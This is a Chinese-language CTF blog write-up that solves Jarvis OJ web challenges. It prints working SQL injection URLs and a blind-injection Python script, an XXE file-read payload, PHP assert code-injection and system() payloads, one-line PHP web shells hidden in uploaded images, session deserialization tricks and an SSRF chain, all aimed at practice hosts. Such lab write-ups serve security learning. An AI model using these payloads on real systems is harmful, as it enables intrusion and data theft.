
<!DOCTYPE html>
<html lang class="loading">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Jarvis OJ web writeup - GAP&#39;s blog</title>
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate">
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="1. Login在响应头中得到了hint也就是说我们post传入的pass经过了md5加密，我们都知道这种登陆问题最常见的payload就是类似于admin&amp;#39;or 1=1#这种，同理我们只要,"> 
    <meta name="author" content="GAP"> 
    <link rel="alternative" href="atom.xml" title="GAP&#39;s blog" type="application/atom+xml"> 
    
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <link rel="stylesheet" href="/css/diaspora.css">
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads" src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
</head>
</html>
<body class="loading">
    <span id="config-title" style="display:none">GAP&#39;s blog</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="icon-home image-icon" href="javascript:;" data-url="http://yoursite.com"></a>
    <div title="播放/暂停" class="icon-play"></div>
    <h3 class="subtitle">Jarvis OJ web writeup</h3>
    <div class="social">
        <!--<div class="like-icon">-->
            <!--<a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
        <!--</div>-->
        <div>
            <div class="share">
                <a title="获取二维码" class="icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class="main">
        <h1 class="title">Jarvis OJ web writeup</h1>
        <div class="stuff">
            <span>四月 03, 2019</span>
            
  <ul class="post-tags-list"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/ctf/">ctf</a></li></ul>


        </div>
        <div class="content markdown">
            <h2 id="1-Login"><a href="#1-Login" class="headerlink" title="1. Login"></a>1. Login</h2><p>在响应头中得到了hint<br><img src="/2019/04/03/Jarvis OJ web writeup/4.png" alt="在这里插入图片描述"><br>也就是说我们post传入的pass经过了md5加密，我们都知道这种登陆问题最常见的payload就是类似于<code>admin&#39;or 1=1#</code>这种，同理我们只要能找到一个md5加密后符合这种类似格式的语句即可，在实验吧当中也有一道相似的题目，最后的payload为<code>ffifdyop</code>，这个字符串经过md5加密后的结果为<br><img src="/2019/04/03/Jarvis OJ web writeup/5.png" alt="在这里插入图片描述"><br>符合上文提到的格式要求，提交后得到flag。</p>
<h2 id="2-LOCALHOST"><a href="#2-LOCALHOST" class="headerlink" title="2. LOCALHOST"></a>2. LOCALHOST</h2><p>burp抓包后添加X-Forwarded-For: 127.0.0.1，得到flag。</p>
<h2 id="3-PORT51"><a href="#3-PORT51" class="headerlink" title="3. PORT51"></a>3. PORT51</h2><p>这题不知道怎么搞得，使用了curl指令用51端口进行访问也没有得到flag…<br><img src="/2019/04/03/Jarvis OJ web writeup/6.png" alt="在这里插入图片描述"><br><img src="/2019/04/03/Jarvis OJ web writeup/7.png" alt="在这里插入图片描述"></p>
<h2 id="4-神盾局的秘密"><a href="#4-神盾局的秘密" class="headerlink" title="4. 神盾局的秘密"></a>4. 神盾局的秘密</h2><p>右键查看元素，看到图片指向了一个包含着任意文件读取的url<br><img src="/2019/04/03/Jarvis OJ web writeup/1.png" alt="在这里插入图片描述"><br>访问一下看看<br><img src="/2019/04/03/Jarvis OJ web writeup/2.png" alt="在这里插入图片描述"><br>而且可以注意到<code>showing.php?img=一个base64加密的文件名</code>，我们尝试一下能不能直接读取<code>flag.php</code>,payload:<code>showing.php?img=ZmxhZy5waHA=</code><br><img src="/2019/04/03/Jarvis OJ web writeup/8.png" alt="在这里插入图片描述"><br>并不可以……但是我们看到了网页是采取<code>readfile()</code>方法对我们的输入进行处理，也就印证了我们对于任意文件读取类型漏洞的判断，既然没有<code>flag.php</code>,那么再尝试访问一下<code>index.php</code>,payload=<code>showing.php?img=aW5kZXgucGhw</code><br>得到<br><img src="/2019/04/03/Jarvis OJ web writeup/9.png" alt="在这里插入图片描述"><br>也就是说需要我们以get的方式传入一个名为class的变量，其内容是一个Shield类，并且会对其进行反序列化操作。但Shield类的构造方式我们未知，再去访问一下<code>shield.php</code>,payload:<code>showimg.php?img=c2hpZWxkLnBocA==</code><br>可以得到<br><img src="/2019/04/03/Jarvis OJ web writeup/3.png" alt="在这里插入图片描述"><br>稍微整理一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//flag is in pctf.php</span><br><span class="line">class Shield &#123;</span><br><span class="line">	public $file;</span><br><span class="line">	function __construct($filename = &apos;&apos;) &#123;</span><br><span class="line">		$this -&gt;file = $filename;</span><br><span class="line">	&#125;</span><br><span class="line">		</span><br><span class="line">	function readfile() &#123;</span><br><span class="line">		if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,&apos;..&apos;)===FALSE &amp;&amp; stripos($this-&gt;file,&apos;/&apos;)===FALSE &amp;&amp; stripos($this-&gt;file,&apos;\\&apos;)==FALSE) &#123;</span><br><span class="line">			return @file_get_contents($this-&gt;file);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>首先是flag存在于<code>pctf.php</code>当中，然后是Shield类的构造，需要我们传入一个名为<code>file</code>的参数。类中还包含了一个<code>readfile()</code>方法，如果我们传入的file当中不包含<code>..</code>,<code>/</code>,<code>\\</code>则会读取出file的内容，我们直接传入存在flag的<code>pctf.php</code>。<br><img src="/2019/04/03/Jarvis OJ web writeup/10.png" alt="在这里插入图片描述"><br>最后的payload为<code>index.php?class=O:6:%22Shield%22:1:{s:4:%22file%22;s:8:%22pctf.php%22;}</code>得到flag。</p>
<h2 id="6-IN-A-Mess"><a href="#6-IN-A-Mess" class="headerlink" title="6. IN A Mess"></a>6. IN A Mess</h2><p>f12查看元素得到提示。<br><img src="/2019/04/03/Jarvis OJ web writeup/11.png" alt="在这里插入图片描述"><br>访问index.phps<br><img src="/2019/04/03/Jarvis OJ web writeup/12.png" alt="在这里插入图片描述"><br>得到了index.php的源码。由题意可知需要我们传入三个变量，分别为<code>$id</code>,<code>$a</code>,<code>$b</code>。首先是对<code>$id</code>变量的处理，<code>$_GET[&#39;id&#39;]</code>的返回值不可以为0但是<code>$id==0</code>的返回值需要为<code>true</code>，注意到这里用到了连续两个等于号，可以利用php弱类型比较进行绕过，只需要传入一个字符串(string会在进行比较时自动转换为int类型的0)。然后是<code>$a</code>中不能出现<code>&#39;.&#39;</code>，<code>file_get_contents()</code>函数是用于将文件的内容读入到一个字符串中的首选方法。利用<code>php://input</code>伪协议可以向<code>$a</code>写入指定的内容(1112 is a nice lab!)。最后对于变量<code>$b</code>,长度需要大于5，然后将<code>111</code>和<code>$b</code>的第一个字符拼接起来(eregi()函数在一个字符串搜索指定的模式的字符串),但是<code>$b</code>的第一位又不可以是4，可以联系eregi()函数的%00截断的性质，当eregi()匹配到%00是便不再向下匹配了，如果我们直接传入一个<code>%00</code>开头的数，则eregi当中的匹配便成为了eregi(“111”,”1112”)符合要求,最后的payload为:<br><img src="/2019/04/03/Jarvis OJ web writeup/13.png" alt="在这里插入图片描述"><br>访问一下给出的地址，可以看出是一个sql注入的题目。过滤了空格<code>（/*1*/方式绕过）</code>,union和select使用双写绕过。最后的注入语句为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://web.jarvisoj.com:32780/%5EHT2mCpcvOLf/index.php?id=-1/*1*/uniunionon/*1*/seselectlect/*1*/1,2,(seselectlect/*1*/group_concat(table_name)/*1*/frfromom/*1*/information_schema.tables/*1*/where/*1*/table_schema=database())%23</span><br><span class="line">http://web.jarvisoj.com:32780/%5EHT2mCpcvOLf/index.php?id=-1/*1*/uniunionon/*1*/seselectlect/*1*/1,2,(seselectlect/*1*/group_concat(column_name)/*1*/frfromom/*1*/information_schema.columns/*1*/where/*12*/table_name=0x636f6e74656e74)%23</span><br><span class="line">http://web.jarvisoj.com:32780/%5EHT2mCpcvOLf/index.php?id=-1/*1*/uniunionon/*1*/seselectlect/*1*/1,2,(seselectlect/*1*/context/*1*/frfromom/*1*/content)%23</span><br></pre></td></tr></table></figure>
<h2 id="7-admin"><a href="#7-admin" class="headerlink" title="7. admin"></a>7. admin</h2><p>进入题目后只给出了一行Hello World，查看元素和响应头之后并没有得到提示，考虑源码泄露和robots.txt的问题，访问robots.txt，得到提示<br><img src="/2019/04/03/Jarvis OJ web writeup/14.png" alt="在这里插入图片描述"><br>访问admin_s3cr3t.php，得到了一个假flag…<br><img src="/2019/04/03/Jarvis OJ web writeup/14-2.png" alt="在这里插入图片描述"><br>看一下响应头<br><img src="/2019/04/03/Jarvis OJ web writeup/15.png" alt="在这里插入图片描述"><br>burp抓包修改一下cookie:<code>admin=1</code>，得到flag。</p>
<h2 id="8-api调用-XEE攻击"><a href="#8-api调用-XEE攻击" class="headerlink" title="8. api调用(XEE攻击)"></a>8. api调用(XEE攻击)</h2><p>一道考察XEE攻击的题目，先了解一下什么是XEE漏洞，XEE漏洞就是XML外部实体注入(XML External Entity)，首先要做的是测试一下我们发送的XML内容能否被应用程序所解析，修改一下<code>Content-Type: application/xml</code>，然后定义一个名为’b’外部实体，其内容为’hello’。</p>
<pre><code>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE a [
&lt;!ENTITY b &quot;hello&quot;&gt;]&gt;
&lt;c&gt;&amp;b;&lt;/c&gt;
</code></pre><p><img src="/2019/04/03/Jarvis OJ web writeup/16.png" alt="在这里插入图片描述"><br>看到了我们发送的内容已经被解析了，也就印证了XEE漏洞的存在。XML实体中的关键字’SYSTEM’会令XML解析器从url中读取内容，我们就可以利用XML解析器去访问攻击者指定的资源后得到flag。<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE a [</span><br><span class="line">&lt;!ENTITY b SYSTEM &quot;file:///home/ctf/flag.txt&quot;&gt;]&gt;</span><br><span class="line">&lt;c&gt;&amp;b;&lt;/c&gt;</span><br></pre></td></tr></table></figure>
<p>资料来源：</p>
<blockquote>
<p><a href="https://www.freebuf.com/articles/web/126788.html#" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/126788.html#</a></p>
</blockquote>
<h2 id="9-babyphp"><a href="#9-babyphp" class="headerlink" title="9. babyphp"></a>9. babyphp</h2><p><img src="/2019/04/03/Jarvis OJ web writeup/17.png" alt="在这里插入图片描述"><br>在about页面当中得到了提示，题目可能涉及git源码泄露的问题，使用工具githack进行探测，在cmd中输入指令<br><img src="/2019/04/03/Jarvis OJ web writeup/18.png" alt="在这里插入图片描述"><br>得到源码<br><img src="/2019/04/03/Jarvis OJ web writeup/19.png" alt="在这里插入图片描述"><br>查看index.php的源码，找到了关键语句。<br><img src="/2019/04/03/Jarvis OJ web writeup/19-2.png" alt="在这里插入图片描述"><br>我们可以利用assert的任意代码执行漏洞对flag.php的内容进行读取。观察语句<code>assert(&quot;file_exists(&#39;$file&#39;)&quot;) or die(&quot;That file doesn&#39;t exist!&quot;);</code>，其中<code>$file</code>的内容是由用户进行输入的，如果我们的输入为<code>&#39;）</code>开头的话，便会使得<code>file_exists（&#39;</code>语句闭合，之后我们便可以进行恶意代码的执行，payload:<code>?page=&#39;) or print_r(file_get_contents(&#39;templates/flag.php&#39;));%23</code>或者<code>?page=&#39;) or system(&quot;cat templates/flag.php&quot;);%23</code>，有一点需要注意的是在对语句进行闭合的时候使用<code>#</code>是无效的，可能是因为不被解析的原因，直接使用<code>%23</code>就可以了。</p>
<h2 id="10-Simple-Injection"><a href="#10-Simple-Injection" class="headerlink" title="10. Simple Injection"></a>10. Simple Injection</h2><p>一道考察sql注入的题目，值得注意的是对空格的过滤，可以使用<code>/*1*/</code>进行绕过，然后就是普通的bool类型盲注了，直接贴脚本了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">s=requests.session()</span><br><span class="line">url=&apos;http://web.jarvisoj.com:32787/login.php&apos;</span><br><span class="line">c=s.get(url)</span><br><span class="line">key=&apos;&apos;</span><br><span class="line">for i in range(1,50):</span><br><span class="line">    print(i)</span><br><span class="line">    for j in range(27,137):</span><br><span class="line">        #ans=&quot;admin&apos;=&apos;0&apos;||ascii(substr((select/*1*/table_name/*1*/from/*1*/information_schema.tables/*1*/where/*1*/table_schema=database()limit/*1*/1,1),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&quot;#&quot;</span><br><span class="line">        ans=&quot;admin&apos;=&apos;0&apos;||ascii(substr((select/*1*/column_name/*1*/from/*1*/information_schema.columns/*1*/where/*1*/table_name=&apos;admin&apos;limit/*1*/0,1),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&quot;#&quot;</span><br><span class="line">        #ans=&quot;admin&apos;=&apos;0&apos;||ascii(substr((select/*1*/password/*1*/from/*1*/admin/*1*/limit/*1*/0,1),&quot;+str(i)+&quot;,1))=&quot;+str(j)+&quot;#&quot;</span><br><span class="line">        payload=&#123;&apos;username&apos;:ans,&apos;password&apos;:&apos;123&apos;&#125;</span><br><span class="line">        c=s.post(url,payload)</span><br><span class="line">        if &apos;密码错误&apos; in c.text:</span><br><span class="line">            key=key+chr(j)</span><br><span class="line">            print(key)</span><br></pre></td></tr></table></figure>
<p>之后得到了:</p>
<pre><code>table_name:admin
column_name:id username password
password:334cfb59c9d74849801d5acdcfdaadc3
将passwordMD5解密后得到:eTAloCrEP
</code></pre><p>使用密码以admin身份登陆后得到flag。</p>
<h2 id="11-Easy-Gallery"><a href="#11-Easy-Gallery" class="headerlink" title="11. Easy Gallery"></a>11. Easy Gallery</h2><p><img src="/2019/04/03/Jarvis OJ web writeup/20.png" alt="在这里插入图片描述"><br>可见这道题目中应当涉及到了多种漏洞，首先gallery应当存在文件上传的功能，尝试一下制作一个一句话图片木马后使用菜刀连接，很可惜失败了。仔细观察一下网站的构架，其url形式为<code>http://web.jarvisoj.com:32785/index.php?page=view</code>,可能存在有任意文件读取的漏洞，，使用一句话<code>&lt;?php @eval($_POST[1])?&gt;</code>制作一句话图片木马进行上传，修改<code>?page</code>后的内容为<code>uploads/xxx.jpg</code>(xxx为图片的id)进行读取，得到错误信息<br><img src="/2019/04/03/Jarvis OJ web writeup/21.png" alt="在这里插入图片描述"><br>原来网站在进行处理的时候会自动加上<code>.php</code>，但是我们想要实现任意文件读取的的文件为<code>.jpg</code>结尾，此时使用<code>%00</code>截断进行绕过，payload:<code>uploads/xxx.jpg</code>,依旧没有得到flag……<br><img src="/2019/04/03/Jarvis OJ web writeup/22.png" alt="在这里插入图片描述"><br>考虑可能是我们的一句话中的内容被waf监测到，故修改一句话木马为<code>&lt;script language=&quot;php&quot;&gt;@eval($_POST[1])&lt;/script&gt;</code>，重新制作一句话图片马，上传访问得到flag。</p>
<h2 id="12-admin"><a href="#12-admin" class="headerlink" title="12. admin"></a>12. admin</h2><p>题目要求我们以admin的方式登陆来获得flag，值得注意的点是有两个可疑的cookie值，分别是hah和role<br><img src="/2019/04/03/Jarvis OJ web writeup/23.png" alt="在这里插入图片描述"><br>hah的长度为32，应当是经过hash函数加密的值，role则为guest的序列化输出，尝试将guest字符串md5加密，结果和hah的值并不相同。<br>考虑收集其余的资源，利用SourceLeakHacker进行源码泄露的探测<img src="/2019/04/03/Jarvis OJ web writeup/24.png" alt="在这里插入图片描述"><br>访问后得到源码<br><img src="/2019/04/03/Jarvis OJ web writeup/25.png" alt="在这里插入图片描述"><br>内容有点杂乱，整合一下：hah的值是由未知的<code>$salt</code>和cookie中的role值的逆置拼接起来并md5加密得到的，我们已经知道了<code>$salt</code>和guest序列化的值拼接后的md5值，很明显是一个利用hash函数拓展攻击解决的题目，使用hashpump(注意序列化后的逆置问题)<br><img src="/2019/04/03/Jarvis OJ web writeup/26.png" alt="在这里插入图片描述"><br>使用burp抓包修改role和hah的值，得到flag。</p>
<h2 id="13-WEB"><a href="#13-WEB" class="headerlink" title="13. WEB?"></a>13. WEB?</h2><p>这道题真的是没看出来哪里有破绽，看了大佬们的博客之后才知道关键的问题出在<code>app.js</code>当中(orz)，这时我们随便在密码的输入框当中输入数据后得到报错的信息<code>Wrong Password!!</code>，在<code>app.js</code>当中搜索指定的字符串<img src="/2019/04/03/Jarvis OJ web writeup/27.png" alt="在这里插入图片描述"><br>得知了用于验证密码是否正确的<code>checkpass.json</code>，如果该json的返回值是true的话则返回成功。此时我们在<code>app.js</code>当中搜索<code>checkpass.json</code>后观察其结构<br>首先是两组数据o和r，然后是判断语句<br><img src="/2019/04/03/Jarvis OJ web writeup/28.png" alt="在这里插入图片描述"><br>可以判断出其是一个二十五元一次的方程组，如果我们输入的数据为方程组的解，则该json的返回值为1。在线解密一下<br><img src="/2019/04/03/Jarvis OJ web writeup/29.png" alt="在这里插入图片描述"><br><img src="/2019/04/03/Jarvis OJ web writeup/30.png" alt="在这里插入图片描述"><br>利用python脚本转化为char类型得到flag。</p>
<h2 id="14-PHPINFO"><a href="#14-PHPINFO" class="headerlink" title="14.PHPINFO"></a>14.PHPINFO</h2><p>进入题目后看到了一段php语句。<br><img src="/2019/04/03/Jarvis OJ web writeup/31.png" alt="在这里插入图片描述"><br>可以看出有一个名为<code>OowoO</code>的类，内部有一个名为<code>mdzz</code>的公有成员属性，构造任意的<code>OowoO</code>类的对象时便会给此对象的<code>mdzz</code>属性赋值为<code>phpinfo();</code>,执行析构函数时则会调用<code>mdzz</code>，也就是展示<code>phpinfo</code>的内容。<br>题目的关键点在于开头的一句话当中<br><img src="/2019/04/03/Jarvis OJ web writeup/32.png" alt="在这里插入图片描述"><br>我们可以看到index.php当中使用的session序列化处理器是<code>php</code>，但是在<code>phpinfo()</code>当中session的序列化处理器则为<code>php_serialize</code>，之后的内容就需要学习一下了</p>
<blockquote>
<p><a href="http://drops.wooyun.org/tips/3909" target="_blank" rel="noopener">http://drops.wooyun.org/tips/3909</a></p>
</blockquote>
<p>漏洞出现在对于不同的序列化处理器，对应的有不同的处理格式，其中常见的有<br><img src="/2019/04/03/Jarvis OJ web writeup/33.png" alt="在这里插入图片描述"><br>此时我们存储session的序列化处理器采用的为<code>php_serialize</code>，如果我们传入的数据为<code>|O:8:&quot;stdClass&quot;:0:{}&#39;</code>，存储时采用的序列化处理器为<code>php_serialize</code>则存储的格式为<code>a:1:{s:4:&quot;ryat&quot;;s:20:&quot;|O:8:&quot;stdClass&quot;:0:{}&quot;;}</code>，而此时我们读取时采用的序列化处理器为<code>php</code>,反序列化后的内容为<code>array(1) {
  [&quot;a:1:{s:4:&quot;ryat&quot;;s:20:&quot;&quot;]=&gt;
  object(stdClass)#1 (0) {}</code>，可以看出我们通过注入<code>|</code>后成功实现了对<code>stdClass</code>的实例化。但是题目本身并没有给我们利用该漏洞的机会，此时可以通过<code>Session Upload Progress</code>实现session的传入。<br> 学习资料：</p>
<blockquote>
<p><a href="https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/#PHPINFO" target="_blank" rel="noopener">https://chybeta.github.io/2017/07/05/jarvisoj-web-writeup/#PHPINFO</a><br><a href="https://blog.csdn.net/wy_97/article/details/78430690" target="_blank" rel="noopener">https://blog.csdn.net/wy_97/article/details/78430690</a></p>
</blockquote>
<p>当一个上传在处理中，同时POST一个与ini中设置的session.upload_progress.name同名的变量时，当PHP检测到这种POST请求时，会在session中添加一组数据，因此可以通过<code>Session Upload Progress</code>来对session进行设置。<br>在本地创建index.html来实现对网站post和上传的同时进行。其内容为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">	&lt;title&gt;test&lt;/title&gt;</span><br><span class="line">	&lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">	&lt;form action=&quot;http://web.jarvisoj.com:32784/index.php&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;</span><br><span class="line">	    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;123&quot; /&gt;</span><br><span class="line">	    &lt;input type=&quot;file&quot; name=&quot;file&quot; /&gt;</span><br><span class="line">	    &lt;input type=&quot;submit&quot; value=&quot;go&quot; /&gt;</span><br><span class="line">	&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>此时只需要修改file的名称，便可以实现对于session的注入。<br>接下来就是对于<code>OowoO</code>类的序列化处理。首先读取当前的文件列表。<code>O:5:&quot;OowoO&quot;:1:{s:4:&quot;mdzz&quot;;s:36:&quot;print_r(scandir(dirname(__FILE__)));&quot;;}</code><br>需要注意的是作为注入关键的<code>|</code>的补充和<code>&quot;</code>的转义问题，修改为<code>|O:5:\&quot;OowoO\&quot;:1:{s:4:\&quot;mdzz\&quot;;s:36:\&quot;print_r(scandir(dirname(__FILE__)));\&quot;;}</code><br>得到关键的文件名称：<code>Here_1s_7he_fl4g_buT_You_Cannot_see.php</code><br><img src="/2019/04/03/Jarvis OJ web writeup/34.png" alt="在这里插入图片描述"><br>之后对其进行<code>print_r(file_get_contents())</code>读取，获得flag。<br><img src="/2019/04/03/Jarvis OJ web writeup/35.png" alt="在这里插入图片描述"></p>
<h2 id="15-inject"><a href="#15-inject" class="headerlink" title="15.inject"></a>15.inject</h2><p>提示要先找到源码，使用源码泄露工具扫描一下<br><img src="/2019/04/03/Jarvis OJ web writeup/36.png" alt="在这里插入图片描述"><br>f12得到源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">require(&quot;config.php&quot;);</span><br><span class="line">$table = $_GET[&apos;table&apos;]?$_GET[&apos;table&apos;]:&quot;test&quot;;</span><br><span class="line">$table = Filter($table);</span><br><span class="line">mysqli_query($mysqli,&quot;desc `secret_&#123;$table&#125;`&quot;) or Hacker();</span><br><span class="line">$sql = &quot;select &apos;flag&#123;xxx&#125;&apos; from secret_&#123;$table&#125;&quot;;</span><br><span class="line">$ret = sql_query($sql);</span><br><span class="line">echo $ret[0];</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>题目的关键点在于闭合时使用的反引号和<code>desc</code>语句，对于<code>desc</code>语句，其可以执行两个参数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;DESCRIBE | DESC&#125; tbl_name [col_name | wild]</span><br></pre></td></tr></table></figure>
<p>我们可以通过闭合语句来进行注入，剩下的就和普通的注入相同了(需要注意的是<code>&#39;</code>被过滤了，查询列名时可以使用16进制编码进行绕过)，注入语句为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://web.jarvisoj.com:32794/?table=flag`%20`union%20select%20database()limit%201,1</span><br><span class="line">http://web.jarvisoj.com:32794/?table=test`%20`union%20select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()limit%201,1</span><br><span class="line">http://web.jarvisoj.com:32794/?table=test`%20`union%20select%20flagUwillNeverKnow%20from%20secret_flag%20limit%201,1</span><br></pre></td></tr></table></figure>
<p>库名：<code>61d300</code><br>表名：<code>secret_flag,secret_test</code><br>列名：<code>flagUwillNeverKnow</code></p>
<h2 id="16-Chopper"><a href="#16-Chopper" class="headerlink" title="16. Chopper"></a>16. Chopper</h2><p>选择以管理员身份登陆，被告知不是admin,f12查看源码后得到提示<code>admin ip is 202.5.19.128</code><br>想当然的使用了X-Forwarded-For和Client-Ip后均失败。查看网站首页的图片，观察到菜刀图片的url为<code>proxy.php?url=http://dn.jarvisoj.com/static/images/proxy.jpg</code>考虑到问题的关键可能是在此处修改ip地址后对admin页面进行访问，payload:<code>proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/</code>得到提示<br><img src="/2019/04/03/Jarvis OJ web writeup/37.png" alt="在这里插入图片描述"><br>之后查看robots.txt，得到了关键的网页<br><img src="/2019/04/03/Jarvis OJ web writeup/38.png" alt="在这里插入图片描述"><br>访问第一个没有响应，再访问第二个，也就是第一个网页相关的代码。是一大堆看不懂的颜文字，复制到本地运行一下<br><img src="/2019/04/03/Jarvis OJ web writeup/39.png" alt="在这里插入图片描述"><br>也就是说我们post的360会以eval的方式被执行，我们选择post进去一个<code>phpinfo()</code>，得到flag。</p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src>
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        <li title="0" data-url="http://link.hhtjim.com/163/5146554.mp3"></li>
                    
                        <li title="1" data-url="http://link.hhtjim.com/qq/001faIUs4M2zna.mp3"></li>
                    
                </ul>
            
        </div>
        
    <div id="gitalk-container" class="comment link" data-ae="false" data-ci data-cs data-r data-o data-a data-d="false">查看评论</div>


    </div>
    
        <div class="side">
            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-Login"><span class="toc-number">1.</span> <span class="toc-text">1. Login</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-LOCALHOST"><span class="toc-number">2.</span> <span class="toc-text">2. LOCALHOST</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-PORT51"><span class="toc-number">3.</span> <span class="toc-text">3. PORT51</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-神盾局的秘密"><span class="toc-number">4.</span> <span class="toc-text">4. 神盾局的秘密</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-IN-A-Mess"><span class="toc-number">5.</span> <span class="toc-text">6. IN A Mess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-admin"><span class="toc-number">6.</span> <span class="toc-text">7. admin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8-api调用-XEE攻击"><span class="toc-number">7.</span> <span class="toc-text">8. api调用(XEE攻击)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9-babyphp"><span class="toc-number">8.</span> <span class="toc-text">9. babyphp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10-Simple-Injection"><span class="toc-number">9.</span> <span class="toc-text">10. Simple Injection</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11-Easy-Gallery"><span class="toc-number">10.</span> <span class="toc-text">11. Easy Gallery</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12-admin"><span class="toc-number">11.</span> <span class="toc-text">12. admin</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#13-WEB"><span class="toc-number">12.</span> <span class="toc-text">13. WEB?</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#14-PHPINFO"><span class="toc-number">13.</span> <span class="toc-text">14.PHPINFO</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#15-inject"><span class="toc-number">14.</span> <span class="toc-text">15.inject</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#16-Chopper"><span class="toc-number">15.</span> <span class="toc-text">16. Chopper</span></a></li></ol>
        </div>
    
</div>


    </div>
</div>
</body>
<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
